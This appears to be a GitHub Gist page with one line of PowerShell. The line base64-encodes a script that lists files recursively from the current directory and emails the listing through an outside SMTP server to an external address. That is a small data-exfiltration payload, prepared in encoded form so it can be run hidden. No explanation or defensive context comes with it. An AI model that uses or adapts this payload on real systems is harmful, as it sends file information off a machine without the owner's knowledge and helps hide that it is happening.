Skip to content

Instantly share code, notes, and snippets.

@RC1140
Created October 14, 2010 15:00
Show Gist options
  • Save RC1140/626312 to your computer and use it in GitHub Desktop.
Save RC1140/626312 to your computer and use it in GitHub Desktop.
ConvertTo-Base64 -textToEncode '$PSEmailServer = "smtp.isdsl.net";$test = ls -recurse;Send-MailMessage -from "[email protected]" -to "[email protected]" -Subject "test" -Body [string]$test -BodyAsHtml'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment